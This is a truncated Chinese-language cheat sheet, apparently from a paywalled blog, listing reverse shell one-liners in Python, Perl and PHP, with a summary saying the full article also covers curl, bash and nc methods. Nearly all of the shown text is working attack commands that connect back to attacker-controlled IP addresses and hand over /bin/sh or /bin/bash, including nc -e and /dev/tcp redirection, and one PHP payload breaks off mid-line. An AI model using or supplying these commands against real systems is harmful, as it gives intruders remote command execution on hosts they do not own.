反弹shell脚本
一、反弹shell的各种姿势
- python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- perl
perl -e 'use Socket;$i="10.10.14.23";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- php
<?php system('nc -e /bin/bash 10.10.14.6 4444')?> //html版
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'");?>
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' //内置语言版
// html无nc版
<?php set_time_

本文详细介绍了反弹shell的各种方法,包括使用Python、Perl、PHP、curl、bash、nc等工具,以及如何通过Perl和Python获取交互式shell,深入探讨了系统和Web安全中的反弹shell技巧。
最低0.47元/天 解锁文章
782

被折叠的 条评论
为什么被折叠?



